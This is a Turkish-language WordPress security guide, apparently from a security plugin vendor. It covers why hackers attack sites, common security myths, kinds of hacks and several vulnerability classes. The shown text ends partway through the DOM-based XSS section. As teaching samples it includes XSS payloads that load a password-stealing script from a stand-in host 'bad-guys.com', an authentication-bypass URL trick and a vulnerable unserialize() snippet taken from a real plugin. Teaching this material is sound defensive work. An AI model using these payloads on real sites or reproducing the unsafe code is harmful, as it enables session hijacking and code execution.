WordPress Güvenliği: En İyi Kılavuz

WordPress güvenliği korkutucu olabilir, ancak olması gerekmiyor. Bu kapsamlı WordPress güvenliği kılavuzunda, teknik bilgisi olmayan herhangi bir kişinin web sitelerini bilgisayar korsanlarının saldırılarını anlayabilmesi ve koruyabilmesi için WordPress web sitenizi güvence altına almanın temellerini basitleştirdik.

Bu WordPress güvenliği kılavuzu, kolayca sindirilebilir 10 bölüme ayrılmıştır. Her bölüm, WordPress güvenliğinin belirli bir yönü konusunda size rehberlik edecektir. Kılavuzun sonunda, farklı güvenlik açıkları türlerini, bilgisayar korsanlarının amaçlarını ve sunucunuzdan WordPress web sitenizin bireysel kullanıcılarına kadar her şeyin nasıl güvence altına alınacağını öğreneceksiniz.

Hadi dalalım!

Bölüm 1: WordPress Güvenli mi?

WordPress güvenli mi? Kısa cevap evet.

WordPress'in Güvenlik Sorunları Var mı?

WordPress'in kendisi güvenli olsa da, WordPress güvenlik hatalarından kaçınmak site sahiplerinin biraz çaba göstermesini gerektirir. Gerçek şu ki, en büyük WordPress güvenlik sorunu kullanıcılarıdır. Platformdaki çoğu WordPress hack'i, site sahiplerinin biraz çabasıyla önlenebilir.

Endişelenme, seni koruduk. Bu kılavuz, web sitenizi güvende tutmak hakkında bilmeniz gereken her şeyi size öğretecektir.

Web sitelerimizin güvenliğini sağlamadan önce beş şeyi anlamamız gerekir.

1. Bilgisayar korsanları neden web sitelerine saldırır?
2. Farklı WordPress hack türleri
3. Belirli WordPress güvenlik açıkları türleri
4. WordPress güvenlik açıkları nasıl önlenir
5. Bir güvenlik açığının ciddiyeti nasıl belirlenir

Bir Hacker Neden Web Siteme Saldırsın?

Bu, en kötü kabusunuz gerçekleşmeye başladığında sorabileceğiniz yaygın bir WordPress güvenlik sorusudur. Bir bilgisayar korsanı neden web siteme saldırsın? İçiniz rahat olsun, saldırının kişisel olma ihtimali yok denecek kadar azdır. Bilgisayar korsanlarının, web sitenizin içeriğiyle hiçbir ilgisi olmayan temel nedenleri vardır. Bilgisayar korsanları genellikle web sitenizin evsiz köpek yavruları için bir yardım sayfası mı yoksa satılık tonlarca harika ürünün bulunduğu bir site mi olduğunu umursamazlar.

Ancak, meçhul bir kimlik web sitenize girip kaosa ve kargaşaya neden olduğunda hedeflenmiş hissetmemek zordur. Stresli hissediyorsunuz ve durum kontrolünüzden çıkıyormuş gibi. Kişisel olarak saldırıya uğramış hissediyorsunuz ve saldırıyı durdurmanın bir yolu olup olmadığını merak ediyorsunuz. Web siteniz olan enkazı kurtaran herhangi bir şey olup olmadığını bile merak edebilirsiniz.

Peki, bir bilgisayar korsanının bir web sitesini hedef almasını sağlayan şey nedir? Web sitenizle, hangi konuları kapsadığı veya bunun gibi bir şeyle ilgisi yoktur. Gerçekte, bilgisayar korsanları, web sitenizin çalışır durumda kalması için kullandığı yazılımı hedefler. Bu yazılımı hackleyerek hassas müşteri verilerini çalabilir ve hatta WordPress web sitenizin kontrolünü ele geçirebilirler.

Ne yazık ki, artan popülaritesi ile WordPress, bilgisayar korsanlarının da hedefi haline geldi. Popüler bir WordPress eklentisinin ciddi bir güvenlik açığı varsa, bir bilgisayar korsanının milyonlarca olmasa da yüz binlerce web sitesini ele geçirme planları vardır. Neyse ki, çoğu eklenti güvenlik açığı, geliştiricileri tarafından hızla düzeltilir.

Bilgisayar korsanları, hassas ve özel bilgileri ele geçirerek, daha sonra bunları bir gelir karşılığında satabilir veya hatta veri fidyesini elinde tutabilir, bu da esasen insanların bilgilerini güvenli ellere geri almak için ödeme yapmasını sağlar.

Peki, bilgisayar korsanlarının birincil motivasyonu nedir?

Kendilerine nakit akışı yaratmak.

İnternet, hayatın her kesimine geçimlik bir ücret üretme fırsatı sunan kazançlı bir yerdir. Ancak bu, herkesin bunu yasal, ahlaki bir şekilde yaptığı anlamına gelmez. Bilgisayar korsanları, en küçük web sitesinden bile yüksek karlar elde ediyor.

İhtiyaç duydukları tüm motivasyon paradır, ancak bazıları bir web sitesini başarıyla ihlal ettiklerinde elde ettikleri güç hissinin tadını çıkarır, ancak büyük çoğunluğu yalnızca nakit için bu iştedir.

2. Bölüm: Çürütülen En İyi 5 WordPress Güvenlik Efsanesi

Bu WordPress Güvenlik kılavuzunun geri kalanına geçmeden önce, bazı WordPress güvenlik mitlerini çürütmek için bir dakikanızı ayıralım.

Gerçekten yardım etmek isteyen iyi niyetli kişilerden internette dolaşan birçok WordPress güvenlik tavsiyesi bulacaksınız. Ne yazık ki, bu tavsiyelerden bazıları WordPress güvenlik mitleri üzerine kuruludur ve aslında WordPress web sitenize herhangi bir ek güvenlik eklemez. Aslında, bazı WordPress güvenlik "ipuçları", sorun ve çatışmalarla karşılaşma olasılığınızı artırabilir.

Aralarından seçim yapabileceğiniz çok sayıda WordPress güvenlik efsanesi var, ancak yalnızca 30.000'den fazla destek biletinde sürekli olarak gördüğümüz ilk 5'e odaklanacağız. Müşterilerimizle yaptığımız bu görüşmeler, en iyi WordPress güvenlik mitlerini seçmek için aşağıdaki kriterler için bir temel olarak kullanıldı:

1. Efsaneden bahsedilme sıklığı.
2. Efsanenin neden olduğu baş ağrılarının sayısı.
3. Efsanenin verdiği sahte güvenlik duygusu.

1. /wp-admin veya /wp-login URL'nizi Gizlemelisiniz (Arka Ucu Gizle olarak da bilinir)

wp-admin'i gizlemenin ardındaki fikir, bilgisayar korsanlarının bulamadıklarını hackleyememeleridir. Giriş URL'niz standart WordPress /wp-admin/ URL'si değilse, kaba kuvvet saldırılarından korunmuyor musunuz?

Gerçek şu ki, Arka Uçları Gizle özelliklerinin çoğu, kurşun geçirmez bir WordPress güvenlik stratejisi olmayan belirsizlik yoluyla güvenlik sağlar. Arka uç wp-admin URL'nizi gizlemek, girişinize yapılan bazı saldırıların hafifletilmesine yardımcı olabilir, ancak bu yaklaşım hepsini durdurmaz.

iThemes Security Pro'nun giriş bilgilerini gizlediklerinde geçersiz giriş denemelerini nasıl bildirdiğine şaşıran kişilerden sık sık destek biletleri alıyoruz. Bunun nedeni, bir tarayıcı kullanmanın yanı sıra, XML-RPC veya REST API kullanmak gibi WordPress sitelerinize giriş yapmanın başka yolları da olmasıdır. Giriş URL'sini değiştirdikten sonra başka bir eklenti veya tema hala yeni URL'ye bağlanabilir.

Aslında, Arka Ucu Gizle özelliği hiçbir şeyi değiştirmez. Evet, çoğu kullanıcının varsayılan giriş URL'sine doğrudan erişmesini engeller. Ancak birisi özel oturum açma URL'sini girdikten sonra, varsayılan WordPress oturum açma URL'sine yeniden yönlendirilir.

Giriş URL'sini özelleştirmenin de çakışmalara neden olduğu bilinmektedir. Wp-login.php'yi kod tabanlarına sabit kodlayan bazı eklentiler, temalar veya üçüncü taraf uygulamalar vardır. Dolayısıyla, sabit kodlanmış bir yazılım parçası siteniz.com/wp-login.php'yi ararken, bunun yerine bir hata bulur.

2. Tema Adınızı ve WordPress Sürüm Numaranızı Gizlemelisiniz

Tarayıcınızın geliştirici araçlarını kullanırsanız, bir WordPress sitesinde çalışan tema adını ve WordPress sürüm numarasını oldukça hızlı bir şekilde görebilirsiniz. Tema adınızı ve WP sürümünüzü gizlemenin ardındaki teori, saldırganların bu bilgilere sahip olması durumunda sitenize girmek için bir plana sahip olacaklarıdır.

Örneğin, yukarıdaki ekran görüntüsüne bakarak bu sitenin Twenty Twenty-One kullandığını ve WordPress sürümünün 5.6 olduğunu görebilirsiniz.

Bu WordPress güvenlik efsanesiyle ilgili sorun, klavyenin arkasında, saldırmak için tema ve WordPress sürüm numarasının mükemmel kombinasyonunu arayan gerçek bir adam olmamasıdır. Ancak, web sitenizde çalışan gerçek kodda bilinen güvenlik açıklarını arayan internette dolaşan akılsız botlar vardır, bu nedenle tema adınızı ve WP sürüm numaranızı gizlemek sizi korumaz.

3. wp-içerik Dizininizi Yeniden Adlandırmalısınız

wp-content dizini, eklentilerinizi, temalarınızı ve medya yükleme klasörlerinizi içerir. Bu, hepsi bir dizinde bir ton iyi malzeme ve yürütülebilir koddur, bu nedenle insanların proaktif olmak ve bu klasörü güvenli hale getirmek istemeleri anlaşılabilir.

Ne yazık ki, wp-içerik adını değiştirmenin siteye ekstra bir güvenlik katmanı ekleyeceği bir WordPress güvenlik efsanesidir. Olmayacak. Tarayıcı geliştirici araçlarını kullanarak değiştirdiğiniz wp-içerik dizininizin adını kolayca bulabiliriz. Aşağıdaki ekran görüntüsünde bu sitenin içerik dizinini /test/ olarak yeniden adlandırdığımı görebiliriz.

Dizinin adının değiştirilmesi sitenize herhangi bir güvenlik eklemeyecektir, ancak /wp-content/ dizin yolu kodlanmış eklentiler için çakışmalara neden olabilir.

4. Web Sitem Hackerların Dikkatini Çekecek Kadar Büyük Değil

Bu WordPress güvenlik efsanesi, birçok siteyi saldırılara karşı savunmasız bırakır. Düşük trafiğe sahip küçük bir sitenin sahibi olsanız bile, web sitenizin güvenliğini sağlamak için proaktif olmanız yine de çok önemlidir.

Düşük trafiğe sahip küçük bir sitenin sahibi olsanız bile, web sitenizin güvenliğini sağlamak için proaktif olmanız yine de çok önemlidir.

Gerçek şu ki, olası bir saldırganın dikkatini çekmek için sitenizin veya işletmenizin büyük olması gerekmez. Bilgisayar korsanları, ziyaretçilerinizden bazılarını kötü amaçlı sitelere yönlendirmek, posta sunucunuzdan spam göndermek, virüsleri yaymak ve hatta Bitcoin madenciliği yapmak için sitenizi bir kanal olarak kullanma fırsatını hala görüyor. Alabilecekleri her şeyi alacaklar.

5. WordPress Güvensiz Bir Platformdur

En zararlı WordPress güvenlik efsanesi, WordPress'in kendisinin güvensiz olmasıdır. Bu doğru değil. WordPress, dünyadaki en popüler içerik yönetim sistemleridir ve güvenliği ciddiye almamakla bu hale gelmemiştir.

Bölüm 3: WordPress Hack'leri ve WordPress Güvenlik Açıkları

4 Tür WordPress Hack

WordPress güvenliğini anlamak söz konusu olduğunda, anlamak önemlidir.

1. SEO İstenmeyen Posta

Bir bilgisayar korsanının web sitenize saldırması için başka bir motivasyon, SEO spam'inin faydalarını elde etmektir. SEO veya arama motoru optimizasyonu, arama motorlarının web sitenizi dizine eklemek veya sıralamak için kullandığı şeydir. Web sayfalarınıza ve blog yayınlarınıza stratejik olarak yerleştirilmiş belirli anahtar kelimeleri kullanarak, web sitenizin Google aramalarında daha üst sıralarda yer almasına yardımcı olabilirsiniz. Bu, web sitenize trafik çekecek ve zaman ayırmaya değer bir kâr elde etmenize yardımcı olabilir.

Bilgisayar korsanları SEO hakkında her şeyi bilir ve bunu kendi avantajları için kullanırlar. Web sitenizin güvenliği ihlal edildiğinde, bilgisayar korsanları web sitenize bir arka kapı kurar. Bu, anahtar kelimelerinizi ve web sitesi içeriğinizi uzaktan kontrol etmelerini sağlar. Genellikle trafiği web sitenizden yönlendirir, doğrudan kendi sitelerine yönlendirir ve sizinkini tamamen geçerler.

Bu, hedef kitlenizin kafasını karıştıracak ve hayal kırıklığına uğratacak, web sitenizin itibarını ve güvenilirliğini yok edecektir. Web sitenizin ziyaretçileri genellikle açıkça dolandırıcılık olan sitelere yönlendirilecek ve gelecekte web sitenizi tekrar ziyaret etmekte tereddüt edeceklerdir.

Yeterince kötü değilmiş gibi, bu yaklaşımı kullanan bilgisayar korsanları, web sitenizi yalnızca diğer insanlara değil, arama motorlarına kötü gösterir. Web siteniz artık meşru görünmeyecek ve sıralaması hızla düşecektir. Aramalarda yüksek bir sıralama olmadan siteniz, ayda birkaç defadan fazla tıklanmayan milyonlardan biri olacaktır.

2. Kötü Amaçlı Yazılım Enjeksiyonları

Pek çok bilgisayar korsanı, kötü amaçlı yazılım bulaştırmak amacıyla web sitenize saldırır. Kötü amaçlı yazılım, web sitenizde kötü amaçlı değişiklikler yapmak için kullanılabilecek küçük kod parçalarıdır. Sitenize kötü amaçlı yazılım bulaşırsa, mümkün olan en kısa sürede uyarılması önemlidir.

Kötü amaçlı yazılımların web sitenizde kaldığı her dakika, web sitenize daha fazla zarar veriyor. Web sitenize ne kadar çok zarar verilirse, web sitenizi temizlemeniz ve geri yüklemeniz o kadar uzun sürer. Düzenli olarak kötü amaçlı yazılım taraması yaparak web sitenizin sağlığını kontrol etmek çok önemlidir. Bu nedenle, kötü amaçlı yazılım taraması yaparak web sitenizin sağlığını sürekli olarak kontrol etmek çok önemlidir.

3. Fidye yazılımı

Bir bilgisayar korsanı, fidye için web sitenize saldırmak isteyebilir. Fidye yazılımı, bir bilgisayar korsanının web sitenizi ele geçirmesi durumunda, siz onlara yüksek bir ücret ödemediğiniz sürece siteyi size geri bırakmayacağı anlamına gelir. Bir fidye yazılımı saldırısının ortalama kapalı kalma süresi 9,5 gündür. 10 günlük NO satışının size maliyeti ne kadar olur?

Bilgisayar korsanlarının talep ettiği ortalama fidye, 2015'te 294 dolardan 2020'de 13.000 doların üzerine çıkarak çarpıcı bir şekilde arttı. Bu tür ödemelerle, çevrimiçi suç işi yavaşlamıyor. Bunun gibi suç toplulukları büyüdükçe web sitenizi düzgün bir şekilde güvenceye almak ve korumak giderek daha kritik hale geliyor.

4. Web Sitesi Tahrifatı

Bazı bilgisayar korsanları biraz eğlence için web sitenize saldırabilir. Doğal olarak daha az kötü olan bir bilgisayar korsanlığı stili, web sitesi bozucularının tarzıdır. Bunlar genellikle bilgisayar korsanlığı becerileriyle oynamaya yeni başlayan çocuklar veya genç yetişkinlerdir. Becerilerini geliştirmenin ve geliştirmenin bir yolu olarak bunun gibi hack'ler yapıyorlar.

Bir web sitesinin tahrif edilmesinden bahsettiğimizde, grafitiyi düşünün. Saldırganlar, bazen eğlenceli veya tuhaf yollarla web sitenizin görünümünü tamamen değiştirir. Tipik web sitesi bozguncuları, işlerini eğlence için veya gösteriş yapmak için yapıyorlar. En iyi tahrifat ödülünü kazanmak için birbirlerini düzeltmeye çalışarak sık sık suçlarının resimlerini yayınlarlar.

İyi haber şu ki, bu hackleme biçimi sizin için daha az tehlikeli. Ek olarak, çoğunlukla gençler ve diğer amatör bilgisayar korsanları tahrifleri gerçekleştirdiğinden, diğer kötü amaçlı yazılım türleriyle karşılaştırıldığında bunları tespit etmek ve web sitenizden kaldırmak daha kolaydır. Genellikle tarayıcılar tarafından algılanabilir ve hızlı bir şekilde kaldırılabilirler.

21 Yaygın WordPress Güvenlik Açıkları Açıklandı

Ne yazık ki, WordPress güvenlik açıkları mevcuttur. WordPress güvenlik açıkları eklentilerinizde, temalarınızda ve hatta WordPress çekirdeğinde bulunabilir. Ve WordPress artık tüm web sitelerinin yaklaşık %40'ına güç sağladığından, güvenlik açıklarını anlama görevi daha da önemlidir. Basitçe söylemek gerekirse: web sitenizin güvenliği konusunda dikkatli olmalısınız.

Bir WordPress güvenlik uzmanı değilseniz, tüm çeşitli WordPress güvenlik açıklarını anlamak göz korkutucu olabilir. Bir güvenlik açığının farklı önem düzeylerini ve WordPress güvenlik açığının risklerini anlamaya çalışmak da bunaltıcı olabilir.

Bu kılavuz, en yaygın 21 WordPress güvenlik açığını tanımlayacak, bir WordPress güvenlik açığının ciddiyetinin nasıl puanlanacağını kapsayacak, bir bilgisayar korsanının güvenlik açığından nasıl yararlanabileceğine ilişkin örnekler verecek ve bu güvenlik açıklarının nasıl önlenebileceğini gösterecektir. Hadi dalalım.

WordPress Güvenlik Açığı nedir?

WordPress güvenlik açığı, bir tema, eklenti veya WordPress çekirdeğindeki bir bilgisayar korsanı tarafından kullanılabilecek bir zayıflık veya kusurdur. Başka bir deyişle, WordPress güvenlik açıkları, bir bilgisayar korsanının kötü niyetli faaliyetleri engellemek için kullanabileceği bir giriş noktası oluşturur.

Web sitesi korsanlığının neredeyse tamamen otomatik olduğunu unutmayın. Bu nedenle, bilgisayar korsanları neredeyse hiç vakit kaybetmeden çok sayıda web sitesine kolayca girebilir. Bilgisayar korsanları, bilinen güvenlik açıklarını arayan interneti tarayan özel araçlar kullanır.

Bilgisayar korsanları kolay hedefleri sever ve bilinen güvenlik açıklarına sahip bir yazılım çalıştıran bir web sitesine sahip olmak, bir bilgisayar korsanına WordPress web sitenize, sunucunuza, bilgisayarınıza veya internete bağlı herhangi bir başka cihaza girmesi için adım adım talimatlar vermek gibidir.

Aylık WordPress güvenlik açığı özet raporlarımız, herkese açık olarak açıklanan tüm WordPress çekirdeğini, WordPress eklentisini ve tema güvenlik açıklarını kapsar. Bu özetlerde, güvenlik açığı bulunan eklentinin veya temanın adını, etkilenen sürümleri ve güvenlik açığı türünü paylaşıyoruz.

Sıfır Gün Güvenlik Açığı nedir?

WordPress güvenliği söz konusu olduğunda, sıfırıncı gün güvenlik açığının tanımını anlamak önemlidir. Güvenlik açığı herkese açıklandığı için geliştiricinin güvenlik açığını yamalamak için sıfır günü vardır. Ve bunun eklentileriniz ve temalarınız için büyük etkileri olabilir.

Tipik olarak, bir güvenlik araştırmacısı bir güvenlik açığı keşfedecek ve güvenlik açığını özel olarak yazılımın sahibi olan şirketin geliştiricilerine açıklayacaktır. Güvenlik araştırmacısı ve geliştirici, bir yama kullanıma sunulduğunda tüm ayrıntıların yayınlanacağı konusunda hemfikirdir. Daha fazla kişiye büyük güvenlik açıklarını güncellemeleri için zaman tanımak için yama yayınlandıktan sonra güvenlik açığının açıklanmasında küçük bir gecikme olabilir.

Bununla birlikte, bir geliştirici güvenlik araştırmacısına yanıt vermezse veya güvenlik açığı için bir yama sağlayamazsa, araştırmacı geliştiriciye bir yama yayınlaması için baskı yapmak için güvenlik açığını kamuya açıklayabilir.

Bir güvenlik açığını herkese açık olarak ifşa etmek ve görünüşe göre bir sıfır gün tanıtmak, verimsiz görünebilir. Ancak, bir araştırmacının geliştiriciye güvenlik açığını düzeltmesi için baskı yapması gereken tek kaldıraç budur.

Google'ın Sıfır Projesi, güvenlik açıklarını ifşa etme konusunda benzer yönergelere sahiptir. 90 gün sonra güvenlik açığının tüm ayrıntılarını yayınlarlar. Güvenlik açığının düzeltilip düzeltilmediği.

Güvenlik açığı, herkesin bulabileceği bir yerdedir. Bir bilgisayar korsanı, geliştirici bir yama yayınlamadan önce güvenlik açığını bulursa, son kullanıcının en kötü kabusu olur…. Aktif olarak sömürülen bir sıfır gün.

Aktif Olarak Yararlanılan Sıfır Gün Güvenlik Açığı nedir?

Aktif Olarak Sömürülen Sıfır Gün Güvenlik Açığı , kulağa tam olarak böyle geliyor. Bilgisayar korsanlarının hedeflediği, saldırdığı ve aktif olarak istismar ettiği yama uygulanmamış bir güvenlik açığıdır.

2018'in sonunda, bilgisayar korsanları WP GDPR Uyumluluk eklentisindeki ciddi bir WordPress güvenlik açığından aktif olarak yararlanıyorlardı. İstismar, yetkisiz kullanıcıların (bir sonraki bölümde bununla ilgili daha fazla bilgi için) WP kullanıcı kayıt ayarlarını değiştirmesine ve varsayılan yeni kullanıcı rolünü bir aboneden bir yöneticiye değiştirmesine izin verdi.

Bu bilgisayar korsanları, bu güvenlik açığını WP GDPR Uyumluluk eklentisi ve güvenlik araştırmacılarından önce buldu. Bu nedenle, eklentinin yüklü olduğu herhangi bir web sitesi, siber suçlular için kolay ve garantili bir işaretti.

Kendinizi Sıfır Gün Güvenlik Açısından Nasıl Korursunuz?

Web sitenizi Zero-Day güvenlik açığından korumanın en iyi yolu, güvenlik açığı düzeltilene kadar yazılımı devre dışı bırakmak ve kaldırmaktır. Neyse ki, WP GDPR Uyumluluk eklentisi geliştiricileri hızlı davrandı ve güvenlik açığı kamuya açıklandıktan bir gün sonra bu güvenlik açığı için bir yama yayınladı.

Yamasız güvenlik açıkları, web sitenizi bilgisayar korsanları için kolay bir hedef haline getirir.

Kimliği Doğrulanmamış ve Kimliği Doğrulanmış WordPress Güvenlik Açıkları

WordPress güvenlik açıklarından bahsederken aşina olmanız gereken iki terim daha var.

1. Kimliği Doğrulanmamış – Kimliği doğrulanmamış bir WordPress güvenlik açığı, herkesin bu güvenlik açığından yararlanabileceği anlamına gelir.
2. Kimliği Doğrulandı – Kimliği doğrulanmış bir WordPress güvenlik açığı, bu güvenlik açığından yararlanmak için oturum açmış bir kullanıcı gerektirdiği anlamına gelir.

Kimliği doğrulanmış bir kullanıcı gerektiren bir güvenlik açığı, özellikle yönetici düzeyinde ayrıcalıklar gerektiriyorsa, bir bilgisayar korsanının istismar etmesi çok daha zordur. Ayrıca, bir bilgisayar korsanının zaten bir dizi yönetici kimlik bilgileri varsa, ortalığı karıştırmak için bir güvenlik açığından yararlanmaları gerekmez.

Bir uyarı var. Bazı kimliği doğrulanmış güvenlik açıklarından yararlanmak için yalnızca abone düzeyinde yetenekler gerekir. Web siteniz herkesin kaydolmasına izin veriyorsa, bununla kimliği doğrulanmamış bir güvenlik açığı arasında pek bir fark yoktur.

WordPress güvenlik açıkları söz konusu olduğunda, 21 yaygın güvenlik açığı türü vardır. Bu WordPress güvenlik açığı türlerinin her birini ele alalım.

1. Kimlik Doğrulama Atlaması

Bir Kimlik Doğrulama Atlama güvenlik açığı, bir saldırganın kimlik doğrulama gereksinimlerini atlamasına ve normalde kimliği doğrulanmış kullanıcılar için ayrılmış görevleri gerçekleştirmesine olanak tanır.

Kimlik doğrulama, bir kullanıcının kimliğini doğrulama işlemidir. WordPress, kullanıcıların kimliklerini doğrulamak için bir kullanıcı adı ve şifre girmesini gerektirir.

Kimlik Doğrulama Atlama Örneği

Uygulamalar, sabit bir parametre kümesine dayalı olarak kimlik doğrulamasını doğrular. Saldırgan, genellikle kimlik doğrulama gerektiren web sayfalarına erişmek için bu parametreleri değiştirebilir.

Bunun gibi çok basit bir örnek, URL'deki bir kimlik doğrulama parametresidir.

 https:/my-website/some-plugint?param=authenticated&param=no

Yukarıdaki URL, no değerine sahip bir kimlik doğrulama parametresine sahiptir. Bu nedenle, bu sayfayı ziyaret ettiğimizde, bu sayfadaki bilgileri görüntülemeye yetkili olmadığımızı bildiren bir mesaj ile karşılaşacağız.

Ancak, kimlik doğrulama denetimi kötü kodlanmışsa, bir saldırgan özel sayfaya erişmek için kimlik doğrulama parametresini değiştirebilir.

 https:/my-website/some-plugint?param=authenticated&param=yes

Bu örnekte, bir bilgisayar korsanı, sayfayı görüntülemek için kimlik doğrulama gereksinimini atlamak için URL'deki kimlik doğrulama değerini evet olarak değiştirebilir.

Kimlik Doğrulamayı Atlama Önlemeyi Önleme

İki faktörlü kimlik doğrulamayı kullanarak web sitenizi Bozuk Kimlik Doğrulama güvenlik açıklarından korumaya yardımcı olabilirsiniz.

2. Arka Kapı Güvenlik Açığı

Bir Arka Kapı güvenlik açığı, hem yetkili hem de yetkisiz kullanıcıların normal WordPress güvenlik önlemlerini atlamasına ve bir bilgisayara, sunucuya, web sitesine veya uygulamaya üst düzey erişim elde etmesine olanak tanır.

Arka Kapı Örneği

Bir geliştirici, bir yönetici kullanıcı olarak kodu kodlama ve test etme arasında hızla geçiş yapabilmeleri için bir arka kapı oluşturur. Ne yazık ki geliştirici, yazılım halka açıklanmadan önce arka kapıyı kaldırmayı unutuyor.

Bir bilgisayar korsanı arka kapıyı bulursa, yazılıma yönetici erişimi elde etmek için giriş noktasından yararlanabilir. Artık bilgisayar korsanının yönetici erişimi olduğuna göre, kötü amaçlı yazılım enjekte etmek veya hassas verileri çalmak gibi her türlü kötü niyetli şeyi yapabilirler.

Bir Arka Kapı Nasıl Önlenir

Bir çok arka kapı tek bir soruna indirgenebilir, güvenlik yanlış yapılandırması. WordPress güvenlik yanlış yapılandırma sorunları, koddaki kullanılmayan tüm özellikleri kaldırarak, tüm kitaplıkları güncel tutarak ve hata mesajlarını daha genel hale getirerek azaltılabilir.

3. PHP Nesne Enjeksiyon Güvenlik Açığı

Bir kullanıcının, unserialized() PHP işlevine geçirilmeden önce sterilize edilmemiş (yani geçersiz karakterler kaldırılmadığı anlamına gelir) bir girdi göndermesiyle bir PHP Nesne Ekleme güvenlik açığı oluşur.

PHP Nesne Enjeksiyon Örneği

Burada, orijinal olarak sumofpwn tarafından bildirilen Örnek Reklam Yöneticisi WordPress eklentisindeki bir PHP Nesne Ekleme güvenlik açığının gerçek dünyadan bir örneği verilmiştir.

Sorun, eklentiler sam-ajax-loader.php dosyasındaki unserialize() sam-ajax-loader.php yapılan iki güvenli olmayan çağrıdan kaynaklanmaktadır. Giriş, aşağıdaki kodda görüldüğü gibi doğrudan POST isteğinden alınır.

 if ( in_array( $action, $allowed_actions ) ) { switch ( $action ) { case 'sam_ajax_load_place': echo json_encode( array( 'success' => false, 'error' => 'Deprecated...' ) ); break; case 'sam_ajax_load_ads': if ( ( isset( $_POST['ads'] ) && is_array( $_POST['ads'] ) ) && isset( $_POST['wc'] ) ) { $clauses = **unserialize( base64_decode( $_POST['wc'] ) )**;

Bu sorun, bir saldırganın kötü amaçlı kod girmesine ve yürütmesine neden olabilir.

PHP Nesne Enjeksiyonu Nasıl Önlenir

Kullanıcı tarafından sağlanan girdiyle unserialize() işlevini kullanmayın, bunun yerine JSON işlevlerini kullanın.

4. Siteler Arası Komut Dosyası Güvenlik Açığı

Bir web uygulaması kullanıcıların URL yoluna özel kod eklemesine izin verdiğinde XSS veya Siteler Arası Komut Dosyası Çalıştırma güvenlik açığı oluşur. Saldırgan, kurbanın web tarayıcısında kötü amaçlı kod çalıştırmak, kötü amaçlı bir web sitesine yeniden yönlendirme oluşturmak veya bir kullanıcı oturumunu ele geçirmek için bu güvenlik açığından yararlanabilir.

Yansıtılan üç ana XSS türü vardır. depolanmış ve DOM Tabanlı

5. Yansıyan Siteler Arası Komut Dosyası Güvenlik Açığı

Yansıtılan XSS veya Yansıtılan Siteler Arası Komut Dosyası, bir istemci isteğinde (tarayıcıda sizin tarafınızdan yapılan bir istek) kötü amaçlı bir komut dosyası gönderildiğinde ve sunucu tarafından geri yansıtıldığında ve tarayıcınız tarafından yürütüldüğünde oluşur.

Yansıtılan Siteler Arası Komut Dosyası Örneği

Diyelim ki yourfavesite.com , web sitesinin içeriğinin bir kısmını görüntülemek için oturum yourfavesite.com gerektiriyor. Diyelim ki bu web sitesi kullanıcı girdilerini düzgün bir şekilde kodlayamıyor.

Saldırgan, kötü amaçlı bir bağlantı oluşturarak bu güvenlik açığından yararlanabilir ve bunu e-postalarda ve sosyal medya gönderilerinde en yourfavesite.com kullanıcılarıyla yourfavesite.com .

Saldırgan, kötü niyetli bağlantının tehdit edici olmayan ve çok tıklanabilir görünmesini sağlamak için bir URL kısaltma aracı kullanır, yourfavesite.com/cool-stuff . Ancak, kısaltılmış bağlantıyı tıkladığınızda, tam bağlantı, tarayıcınız yourfavesite.com/cool-stuff?q=cool-stuff<\script&src=”http://bad-guys.com/passwordstealingcode.js tarafından yürütülür.

Bağlantıyı tıkladıktan sonra, yourfavesite.com ve kötü amaçlı komut dosyası tarayıcınıza geri yansıtılarak , saldırganın oturum çerezlerinizi ve yourfavesite.com hesabınızı ele geçirmesine olanak tanıyacaktır.

Yansıyan Siteler Arası Komut Dosyası Nasıl Önlenir

OWASP çapraz komut dosyası çalıştırma önleme hile sayfasındaki Kural #5, güvenilmeyen verileri HTML URL parametre değerlerine eklemeden önce URL kodlamasıdır. Bu kural, güvenilmeyen verileri HTTP GET parametre değerine eklerken yansıtılan bir XSS güvenlik açığı oluşturmayı önlemeye yardımcı olabilir.

<a href="http://www.yourfavesite.com?test=...ENCODE UNTRUSTED DATA BEFORE PUTTING HERE...">link</a >

6. Depolanan Siteler Arası Komut Dosyası Güvenlik Açığı

Stored XSS veya Stored Cross-Site Scripting güvenlik açığı, bilgisayar korsanlarının kötü amaçlı kod enjekte etmesine ve bir web uygulamasının sunucusunda saklamasına olanak tanır.

Depolanan Siteler Arası Komut Dosyası Örneği

Bir saldırgan, yourfavesite.com ziyaretçilerin sitenin yorum bölümüne HTML etiketleri yerleştirmesine izin verdiğini yourfavesite.com . Böylece saldırgan yeni bir yorum oluşturur:

Harika makale! Bu diğer ilgili harika <script src=”http://bad-guys.com/passwordstealingcode.js> makalesine göz atın. </script>

Not: Yansıtılan bir XSS güvenlik açığı, bir ziyaretçinin yürütmek için kötü amaçlı kod bağlantısını tıklamasını gerektirir. Depolanmış bir XSS saldırısı, yalnızca yorumun bulunduğu sayfanın ziyaret edilmesini gerektirir. Kötü amaçlı kod, her sayfa yüklemesinde çalışır.

Artık kötü adamımız yorumu eklediğine göre, bu sayfanın gelecekteki her ziyaretçisi onların kötü niyetli komut dosyasına maruz kalacak. Komut dosyası, kötü adamın web sitesinde barındırılır ve ziyaretçilerin oturum çerezlerini ve en yourfavesite.com hesaplarını ele yourfavesite.com yeteneğine sahiptir.

Depolanan Siteler Arası Komut Dosyası Nasıl Engellenir

OWASP çapraz komut dosyası çalıştırma önleme hile sayfasındaki 1 numaralı kural, HTML öğelerine güvenilmeyen verileri eklemeden önce HTML kodlamasıdır.

 <body> ...ENCODE UNTRUSTED DATA BEFORE PUTTING HERE... </body>

 <div> ...ENCODE UNTRUSTED DATA BEFORE PUTTING HERE... </div>

Komut dosyası, stil veya olay işleyicileri gibi herhangi bir yürütme bağlamına geçişi önlemek için aşağıdaki karakterleri kodlama . Spesifikasyonda onaltılık varlıkların kullanılması önerilir.

 & --> &amp; < --> &lt; > --> &gt; " --> &quot; ' --> &#x27;

7. Belge Nesne Modeli Tabanlı Siteler Arası Komut Dosyası Çalıştırma Güvenlik Açığı

DOM tabanlı bir XSS veya Belge Nesne Modeli Tabanlı Siteler Arası Komut Dosyası Çalıştırma güvenlik açığı, bir web sitesinin istemci tarafı komut dosyası kullanıcı tarafından sağlanan verileri Belge Nesne Modeli'ne (DOM) yazdığında ortaya çıkar. Web sitesi daha sonra DOM'dan kullanıcı tarihli bilgiyi okur ve bunu ziyaretçinin web tarayıcısına verir.

Kullanıcı tarafından sağlanan veriler düzgün bir şekilde işlenmezse, bir saldırgan, web sitesi DOM'den kodu okuduğunda yürütülecek kötü amaçlı kodu enjekte edebilir.

